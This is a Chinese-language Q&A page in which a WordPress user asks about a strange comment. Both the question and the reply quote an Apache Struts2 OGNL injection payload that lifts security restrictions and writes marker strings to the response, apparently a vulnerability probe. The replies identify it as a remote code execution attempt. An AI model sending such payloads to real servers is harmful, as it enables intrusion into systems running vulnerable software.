首頁  >  文章  >  後端開發  >  javascript - 有人在wordpress評論裡寫這個,這段程式碼是做什麼用的?

javascript - 有人在wordpress評論裡寫這個,這段程式碼是做什麼用的?

WBOY
WBOY原創
2016-09-29 09:33:021105瀏覽

'+(#context[”xwork.MethodAccessor.denyMethodExecution”]=new java.lang.Boolean(false),#_memberAccess[”allowStaticMethodAccess”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={ },#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWter? #b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+'

回覆內容:

'+(#context[”xwork.MethodAccessor.denyMethodExecution”]=new java.lang.Boolean(false),#_memberAccess[”allowStaticMethodAccess”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={ },#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWter? #b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+'

印像中存在這麼一個java的struts2框架遠端執行不同的程式碼

一般這種都是清除漏洞的腳本所為,如果不是用的只是wordpress,那你裝一個防止垃圾評論的插件就可以了,不

陳述:
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn